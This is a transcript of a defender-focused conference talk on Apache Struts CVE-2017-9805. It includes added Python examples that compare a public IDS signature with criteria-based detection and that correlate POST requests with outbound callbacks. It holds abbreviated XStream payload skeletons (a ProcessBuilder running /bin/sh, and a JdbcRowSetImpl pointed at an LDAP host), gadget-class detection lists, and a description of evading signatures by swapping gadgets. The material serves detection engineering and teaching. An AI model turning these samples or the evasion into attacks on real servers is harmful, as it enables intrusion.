Death by a Thousand Struts: A Defender's Tale - Justin Warner (@sixdub) - PowerPoint PPT Presentation



slide-1
SLIDE 1

Death by a Thousand Struts

A Defender's Tale

Justin Warner (@sixdub)

slide-2
SLIDE 2

$Whoami - Justin Warner (@sixdub)

  • Principal Security Engineer @ ICEBRG, focusing on detection, network data analysis, and adversary emulation testing
  • Computer Science grad from USAF Academy & former military computer nerd
  • Former red team lead who worked w/ multi-national Fortune 100 enterprises
  • BlackHat USA Instructor in 2015 & 2016 for Adaptive Red Team Tactics

slide-3
SLIDE 3

Red -> Blue

My career has been a pretty constant flip-flop of roles. I feel as though it has strengthened me technically and professionally.

Job #1: Network Analyst, US Air Force
Job #2: Red Team Lead, Adaptive Threat Division (ATD)
Job #3: Principal Security Engineer, ICEBRG

Understanding the ins and outs of your opponent's operations makes you a better-prepared opponent.

slide-4
SLIDE 4

Let’s Tell A Story

slide-5
SLIDE 5

This Thing Called Struts

“Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON.”

https://struts.apache.org/

Apache Struts is a prevalent framework, often exposed on internet-connected devices. Because of its large and sophisticated capability set, it carries a number of external dependencies and legacy code bases.

slide-6
SLIDE 6

Is Struts Common?

Internet-connected Apache devices are everywhere (17 million on Shodan). Struts is also everywhere:

“65 percent of the Fortune 100 companies are actively using web applications built with the Struts framework. This includes organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and Showtime.”

Additionally, based on experience, internal applications are often built on Struts, making them a juicy target during post-exploitation.

https://thenewstack.io/critical-vulnerability-apache-struts-puts-thousands-web-applications-risk/ via Shodan.io

slide-7
SLIDE 7

Are People Still Targeting Struts?

https://greynoise.io/ Many thanks to Andrew Morris for giving me data!

Takeaways:

  • VPS providers are a common scanning source
  • People are still looking for Struts servers
  • This is only for external-facing hosts, looking for the default paths from exploit POCs

slide-8
SLIDE 8

Lots of CVEs

CVE-2017-5638: “The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.”

https://nvd.nist.gov/vuln/detail/CVE-2017-5638

CVE-2017-9791: “The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.”

https://nvd.nist.gov/vuln/detail/CVE-2017-9791

CVE-2017-9805: “The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.”

https://nvd.nist.gov/vuln/detail/CVE-2017-9805

slide-9
SLIDE 9

Lots of Struts IR in 2017

In 2017, I saw many engagements that began with Struts exploitation. Across these cases, Struts exploitation led to:

  • Continuous and automated compromise for criminal purposes
  • Enterprise wide ransomware deployments
  • Targeted attacks by threat groups with focused objectives

Even after signatures were released and people knew what to look for and how to fix, we continued to witness devastating in-the-wild compromise. But why?!

slide-10
SLIDE 10

Real World Conversation

Common Themes:

  • Did not know the asset was exposed (lacked visibility). Often a legacy asset w/ no endpoint protection.
  • Trusted their security stack and the detections it provided.
  • Did not have any practice performing response and remediation on the public-facing asset.

Takeaways:

  • Visibility is a key first step.
  • The state of detection within organizations is still maturing.
  • Offensive testing and exercises could have helped these particular customers.

Thank you Kaya (my daughter) for showing how I feel here

slide-11
SLIDE 11

What We Will Discuss - Goals

  • Blue teams must better understand the applied detection logic in their environments.
  • Detection authors must strive to better understand root cause/adversary behavior to author robust indicators and analytics.
  • Red teams should focus their actions to be threat representative to further a training objective. This might include noisy actions. This might get you caught, or it might identify a detection gap.

Let’s use Apache Struts as a case study.

slide-12
SLIDE 12

Analysis of POC Exploit & Detection

slide-13
SLIDE 13

Time For Fun

slide-14
SLIDE 14

One public signature for CVE-2017-9805

Is This Signature / Rule Effective?

alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder?)"; flow:to_server,established; content:"java.lang.ProcessBuilder"; nocase; http_client_body; fast_pattern; content:"<command"; nocase; distance:0; http_client_body; pcre:"/^[\s>]/RPs"; metadata: former_category EXPLOIT; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024663; rev:1; metadata:affected_product Apache_Struts2, attack_target Web_Server, deployment Perimeter, signature_severity Critical, created_at 2017_09_06, performance_impact Low, updated_at 2017_09_06;)

Where did the content match highlighted in red come from?

slide-15
SLIDE 15

Abuse Gadget From MSF

Is this the only abuse gadget that can be used?

slide-16
SLIDE 16

Public Signatures

SID      Rule Message
2024663  ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)
2024664  ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec)
2024668  ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1
2024669  ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2
2024670  ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3
2024671  ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4
2024672  ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5
2024673  ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6
2024674  ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec)
2024675  ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)

https://rules.emergingthreats.net/

slide-17
SLIDE 17

Public Signature Analysis

Colour coding applied to the SID table from SLIDE 16 (https://rules.emergingthreats.net/):

  Black = Targeting very specific abuse gadgets
  Green = Targeting the “ysoserial” Base64 blob
  Red = Hardcoded URI of the app

slide-18
SLIDE 18

Swapping Abuse Gadgets For Fun & Profit

slide-19
SLIDE 19

Time For Fun

slide-20
SLIDE 20

Too Easy!

This evasion took less than an hour of development and testing.

  • https://github.com/mbechler/marshalsec

Just in case you didn’t assume this… bad guys know how to do this research too.

[Figure: “Requirement” / “Goal” table. Slide credit: Casey Smith and Matt Graeber, https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/MattGraeber.CaseySmith.pdf]

slide-21
SLIDE 21

Back To Basics Of Detection

slide-22
SLIDE 22

Getting In a Habit

Identify TTP -> Intel & Behavior Analysis -> Loose / Strict Criteria -> Indicator Creation -> Durability Testing -> Indicator Deployed -> Indicator Maintenance

A rough process that can be used to work through authoring an indicator. Let’s further dive in on the light blue ones (criteria definition and indicator creation)…

slide-23
SLIDE 23

Defining Loose & Strict Criteria

Strict Criteria: components of a particular attack chain that are required to be present for the chain to exist.

Loose Criteria: components of a particular attack chain that will commonly be present in the attack chain. Generally, at least one of these will be present. Also includes attacker behavior choices.

(Strict Criteria 1 AND Strict Criteria 2) AND (Loose Criteria 1 OR Loose Criteria 2 OR Loose Criteria 3)

slide-24
SLIDE 24

Behind The Scenes

https://securingtomorrow.mcafee.com/mcafee-labs/apache-struts-at-rest-analyzing-remote-code-execution-vulnerability-cve-2017-9805/

Attacker -> Unpack XML nodes into Reflection Provider -> doUnmarshal searches for the class where the node names are defined -> Unmarshal XML object and populate Map object -> Update fields with values from nodes -> New structure returned to “Object” -> Abuse gadget executed upon (K,V) access

Abuse Gadgets:

  • System command execution
  • JNDI
  • Remote classloading (plain)
  • Remote classloading (serviceloader)
  • Local classloading

*image from McAfee Labs

slide-25
SLIDE 25

Criteria for Network Detection of CVE-2017-9805

Strict

  • Exploit payload is XML
  • POST requests with ‘application/xml’ data

Loose

  • HTTP or SSL/TLS
  • Abuse gadget paths:
    • JNDI: org.springframework.jndi.support.SimpleJndiBeanFactory, com.sun.rowset.JdbcRowSetImpl, com.sun.jndi.ldap.LdapAttribute
    • Remote classloading (plain): javax.naming.Reference, com.sun.jndi.rmi.registry.ReferenceWrapper
    • Remote classloading (serviceloader): javax.script.ScriptEngineFactory
    • System command execution: java.lang.ProcessBuilder, java.lang.Runtime.exec
    • Local classloading: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

slide-26
SLIDE 26

Indicator Creation

Process by which we author rules/signatures/analytics to detect a clearly identified TTP.

  • Leverage all of the systems at your disposal.
  • There are usually many ways to detect something. Consider this a one-to-many phase.
  • Indicator / detection overlap is a good thing if you can properly visualize and use the alerts.
  • Helps a TON if you can explore data in the same “language” in which you author indicators.
  • Helps a TON if you can perform retroactive search.

[Figure: one TTP fanning out to many indicators]

slide-27
SLIDE 27

IDS Signature FTW

For the purposes of this demonstration, we can construct a basic network IDS signature for this activity leveraging the criteria. Left as “exercise for audience”.

  • Consider ports/protocols
  • Include strict criteria
  • Boolean “or” on the loose criteria
  • Optimize rule for performance

Many thanks to Dan Caseldan and Chenming Xu aka Sparrow for the example!

https://suricata-ids.org/
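Working through the “exercise for the audience” above, here is an added example (not code from the deck, from ICEBRG, or from the Emerging Threats rule set) that puts the narrow ET SID 2024663 logic from SLIDE 14 beside a detection built from the strict/loose criteria of SLIDE 25, and runs both over constructed sample requests. The request bodies are abbreviated skeletons carrying only the strings the detections key on, not working exploit chains; the `/orders/3` path is the one the public PoC uses against the showcase app, and hosts use documentation address ranges. `SURICATA_SKETCH` shows how the same criteria would look as a single rule; treat its exact syntax as an assumption to be tested on your sensor.

```python
"""Signature vs. criteria-based detection for CVE-2017-9805, run over
constructed sample requests (added example; not from the deck)."""
import re
from dataclasses import dataclass

# Loose criteria from the deck: class names of XStream abuse gadgets, by
# category. "java.lang.Runtime" covers the Runtime.exec gadget in XML form.
GADGET_CLASSES = {
    "JNDI": [
        "org.springframework.jndi.support.SimpleJndiBeanFactory",
        "com.sun.rowset.JdbcRowSetImpl",
        "com.sun.jndi.ldap.LdapAttribute",
    ],
    "remote classloading (plain)": [
        "javax.naming.Reference",
        "com.sun.jndi.rmi.registry.ReferenceWrapper",
    ],
    "remote classloading (serviceloader)": ["javax.script.ScriptEngineFactory"],
    "system command execution": ["java.lang.ProcessBuilder", "java.lang.Runtime"],
    "local classloading": ["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"],
}


@dataclass
class HttpRequest:
    method: str
    uri: str
    content_type: str
    body: str


# ET SID 2024663 in regex form: "java.lang.ProcessBuilder" (nocase), later
# "<command" (distance:0), then one whitespace char or ">" (pcre ^[\s>] with /R).
ET_2024663 = re.compile(r"java\.lang\.ProcessBuilder.*?<command[\s>]", re.I | re.S)


def et_2024663_matches(req: HttpRequest) -> bool:
    """The narrow public rule: only the ProcessBuilder gadget shape."""
    return ET_2024663.search(req.body) is not None


def strict_criteria(req: HttpRequest) -> bool:
    """What every exploit of the REST plugin must have: a POST whose body is
    XML. Checked first, so gadget strings in JSON or log text do not alert."""
    return (req.method.upper() == "POST"
            and req.content_type.lower().startswith("application/xml")
            and req.body.lstrip().startswith("<"))


def loose_criteria(req: HttpRequest) -> list:
    """OR over the gadget class names; returns every class that matched."""
    body = req.body.lower()
    return [f"{cat}: {cls}" for cat, classes in GADGET_CLASSES.items()
            for cls in classes if cls.lower() in body]


def criteria_match(req: HttpRequest) -> list:
    """(strict AND strict) AND (loose OR loose ...); empty list means no alert."""
    return loose_criteria(req) if strict_criteria(req) else []


# Constructed samples (abbreviated; not working exploits).
MSF_STYLE = HttpRequest("POST", "/struts2-rest-showcase/orders/3", "application/xml",
    '<map><entry><jdk.nashorn.internal.objects.NativeString>'
    '<iStream class="java.lang.ProcessBuilder"><command>'
    '<string>/bin/sh</string><string>-c</string><string>id</string>'
    '</command></iStream></jdk.nashorn.internal.objects.NativeString></entry></map>')
GADGET_SWAPPED = HttpRequest("POST", "/api/orders/3", "application/xml",   # same bug, JNDI gadget
    '<map><entry><jdk.nashorn.internal.objects.NativeString>'
    '<dataSource class="com.sun.rowset.JdbcRowSetImpl">'
    '<dataSourceName>ldap://198.51.100.23:1389/x</dataSourceName>'
    '<autoCommit>true</autoCommit></dataSource>'
    '</jdk.nashorn.internal.objects.NativeString></entry></map>')
BENIGN_XML = HttpRequest("POST", "/api/orders", "application/xml",
    "<order><clientName>Bob</clientName><amount>30</amount></order>")
JSON_WITH_TRACE = HttpRequest("POST", "/api/errors", "application/json",  # gadget name, not XML
    '{"trace": "java.io.IOException at java.lang.ProcessBuilder.start"}')

SAMPLES = {"msf_style": MSF_STYLE, "gadget_swapped": GADGET_SWAPPED,
           "benign_xml": BENIGN_XML, "json_with_trace": JSON_WITH_TRACE}


def evaluate_all() -> dict:
    """Run both detections over every sample."""
    return {name: {"et_2024663": et_2024663_matches(r), "criteria": criteria_match(r)}
            for name, r in SAMPLES.items()}


# The same criteria as one Suricata rule, in the older modifier syntax the
# deck's rule uses. Syntax is an assumption: validate on your own sensor.
# The loose OR is a pcre alternation; /P scopes it to the client body.
SURICATA_SKETCH = r'''
alert http any any -> $HOME_NET any (msg:"Struts2 REST plugin XStream gadget class in XML POST body";
  flow:to_server,established; content:"POST"; http_method;
  content:"application/xml"; http_header; nocase;
  pcre:"/(?:java\.lang\.(?:ProcessBuilder|Runtime)|com\.sun\.rowset\.JdbcRowSetImpl|com\.sun\.jndi\.ldap\.LdapAttribute|javax\.naming\.Reference|com\.sun\.jndi\.rmi\.registry\.ReferenceWrapper|javax\.script\.ScriptEngineFactory|SimpleJndiBeanFactory|TemplatesImpl)/Pi";
  reference:cve,2017-9805; classtype:attempted-user; sid:9000001; rev:1;)
'''

if __name__ == "__main__":
    for name, result in evaluate_all().items():
        print(f"{name:16} ET2024663={result['et_2024663']!s:5} criteria={result['criteria']}")
```

The gadget-swapped request is the SLIDE 18-20 evasion: the ET rule never fires on it, while the criteria-based check still returns the JNDI class it carries. The JSON sample shows why the strict criteria come first: it contains the ProcessBuilder string but is not an XML POST, so it produces no alert.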

slide-28
SLIDE 28

More Demo

slide-29
SLIDE 29

Getting Creative With Detection

slide-30
SLIDE 30

Changing Old View of “Blinky Boxes”

What if we decide to treat traditional alerts from systems as “just another event” that we look at holistically…

  • Less concern about FPs
  • Ability to author “hunt”-style signatures on various systems
  • Post-process, enrich, and perform detection later
  • Combine alert streams, network metadata, application logs, and endpoint data for total win.

https://memegenerator.net/instance/61315184/disaster-girl- intrusion-detection

slide-31
SLIDE 31

The Modern Approach

Think of a traditional “sensing” system like the human body’s nervous system…

[Figure: Senses -> Nerves -> Brain, mapped to Event Streams From Sensors -> Data Processing -> Analytics and Detection; example monitored asset labelled on the diagram: Payment Systems]

slide-32
SLIDE 32

Behavioral Detection

Rather than look for specific *known* attacks, look for abstract patterns or behaviors of threat actors.

  • Move away from a reactionary IOC-based approach.
  • Can be FP-prone depending on approach. Can you handle the triage?
  • Challenging at scale. Are you tall enough to ride the ride?

Better when you retain forensic event-level detail for transparency.

Atomic Indicators -> Singular Event-Based Indicators -> Behavioral Indicators

Example w/ FIN7:
  Atomic indicator: 204.155.31[.]167
  Singular event: DNS TXT to KingServers ASN
  Behavioral: “Abnormal DNS ratio” event to a low-prevalence server

slide-33
SLIDE 33

Dream Bigger On The Struts Scenario

Imagine generating events for things like:

  • A non-browser (JA3 fingerprint) connects to an SSL/TLS webserver
  • An internet asset classified as a “server” connects to my server
  • External access to a resource with little prevalence in the dataset (novelty detection)
  • A POST is followed by a connection out to an external IP (or the requestor IP) within a time threshold
  • A POST is followed by a process start event with processes inside a certain “category”

Take these observations and perform time series analysis, clustering, correlation, etc. Will these survive in your environments? ¯\_(ツ)_/¯
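The “POST followed by a connection out to an external IP (or the requestor IP) within a time threshold” event above, as an added example that is not part of the deck. It runs over constructed HTTP and connection logs whose fields mirror Zeek's http.log and conn.log (an assumption about your data source), and uses an explicit list of internal networks rather than the `ipaddress` module's notion of “global”, because the documentation ranges standing in for the internet here are not classed as global.

```python
"""POST-then-callback correlation over constructed HTTP and connection logs
(added example; not from the deck). Fields mirror Zeek http.log/conn.log."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class HttpEvent:
    ts: float     # epoch seconds
    src: str      # client (requestor) IP
    dst: str      # web server IP
    method: str
    uri: str


@dataclass(frozen=True)
class ConnEvent:
    ts: float
    src: str      # originator
    dst: str      # responder
    dport: int


# Assumption: our address space. Anything outside it is "external"; the
# documentation ranges 192.0.2/24, 198.51.100/24 and 203.0.113/24 play the
# internet in the sample data.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]


def is_external(ip: str) -> bool:
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def post_then_callback(http_events, conn_events, window_s: float = 60.0) -> list:
    """Flag every POST that the receiving server follows, within window_s
    seconds, by opening its own connection to an external IP. A payload that
    spawns a reverse shell or fetches a second stage produces exactly this
    shape; an app server talking to internal backends does not.
    callback_to_requestor marks the strongest form: the server connects
    straight back to the IP that sent the POST."""
    conns = sorted(conn_events, key=lambda c: c.ts)
    alerts = []
    for h in http_events:
        if h.method.upper() != "POST":
            continue
        for c in conns:
            if c.ts < h.ts:
                continue
            if c.ts > h.ts + window_s:
                break                       # sorted, so nothing later can match
            if c.src != h.dst or not is_external(c.dst):
                continue
            alerts.append({
                "post_ts": h.ts, "requestor": h.src, "uri": h.uri,
                "server": h.dst, "callback_dst": c.dst, "callback_dport": c.dport,
                "delta_s": c.ts - h.ts,
                "callback_to_requestor": c.dst == h.src,
            })
    return alerts


# Constructed sample logs: one web server (10.0.0.5), one attacker
# (198.51.100.23), one ordinary client (203.0.113.7).
HTTP_LOG = [
    HttpEvent(100.0, "198.51.100.23", "10.0.0.5", "POST", "/api/orders/3"),
    HttpEvent(200.0, "203.0.113.7", "10.0.0.5", "POST", "/api/orders"),
    HttpEvent(300.0, "203.0.113.7", "10.0.0.5", "POST", "/api/orders"),
    HttpEvent(500.0, "203.0.113.7", "10.0.0.5", "GET", "/api/orders/1"),
    HttpEvent(600.0, "203.0.113.7", "10.0.0.5", "POST", "/api/orders/3"),
]
CONN_LOG = [
    ConnEvent(103.0, "10.0.0.5", "198.51.100.23", 4444),  # reverse shell back to the requestor
    ConnEvent(205.0, "10.0.0.5", "10.0.0.9", 5432),       # internal DB: ignored
    ConnEvent(400.0, "10.0.0.5", "192.0.2.50", 443),      # 100 s after the POST: outside window
    ConnEvent(505.0, "10.0.0.5", "192.0.2.50", 443),      # nearest request was a GET
    ConnEvent(610.0, "10.0.0.5", "192.0.2.77", 80),       # second stage from a third host
]

if __name__ == "__main__":
    for a in post_then_callback(HTTP_LOG, CONN_LOG):
        print(a)
```

On the sample data only the first and last POSTs alert: the first is the classic reverse shell back to the requestor, the last is a fetch from a different external host, which the `callback_to_requestor` flag keeps distinguishable for triage. The window and the internal-network list are the two knobs that decide whether this survives in a real environment.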

slide-34
SLIDE 34

Where Does The Red Team Fit?

slide-35
SLIDE 35

Let’s Conduct a Self Survey

1. Are you exercising your client’s detection & response capabilities to the fullest extent across the adversary's kill chain?
2. Are you ensuring your client can effectively identify adversary behaviors in addition to tool artifacts?
3. Are you exercising your blue team’s processes AFTER detection, to include investigation, remediation and eviction?
4. Are you working with your client after engagements to close the detection gap and reduce dwell time?

slide-36
SLIDE 36

Self-Reflection

Red team thoughts:

  • Emulate adversarial TTPs
  • Exercise processes/people/systems
  • Focus on detection, response, eviction and remediation.
  • Allow for “practice” in a live environment.

These make me sad:

  • “I always have to be advanced.”
  • “I take whatever path gets me to my objective.”
  • “It’s not my job to know defense.”
  • “I can’t share my TTPs with blue team, then I won’t be able to stay ahead.”

Many different views on these topics. Definitions aside, the real thing that matters is the “customer” gets value.

slide-37
SLIDE 37

Offense Could Have Helped

Here’s how it could have helped:

  • Vulnerability scanning would have identified the exposed vulnerable assets.
  • Penetration testing would have demonstrated the risk of that asset being exposed and what an attack chain might look like.
  • Red teaming would have allowed the blue team to exercise a full incident response process on this asset, to include remediation, and get feedback from the adversary.
  • Atomic detection testing would have validated that the organization had the visibility it needed to detect the TTPs.

When I was a red teamer, I never used exploits because they “get you caught”... Looking back, I question that mindset…

slide-38
SLIDE 38

Atomic Detection Testing

Atomic detection testing is the measured and structured unit testing of detection capabilities in a live environment. Detection is a class of engineering and engineers test their products.

  • Controlled and isolated process
  • Atomic testing by itself is NOT red teaming (in my opinion)
  • Red teamers as threat experts can be VERY helpful in this process or perform the testing themselves

https://github.com/uber-common/metta
https://github.com/mitre/caldera
https://github.com/redcanaryco/atomic-red-team
https://github.com/endgameinc/RTA

slide-39
SLIDE 39

Wrap Up

slide-40
SLIDE 40

Parting Thought

We (red and blue) are all in this together.

“Sometimes when you win, you really lose, & sometimes when you lose, you really win, & sometimes when you win or lose, you actually tie, & sometimes when you tie, you actually win or lose. Winning or losing is all one organic mechanism, from which one extracts what one needs.”

  - Rosie Perez

slide-41
SLIDE 41

Thank you Questions?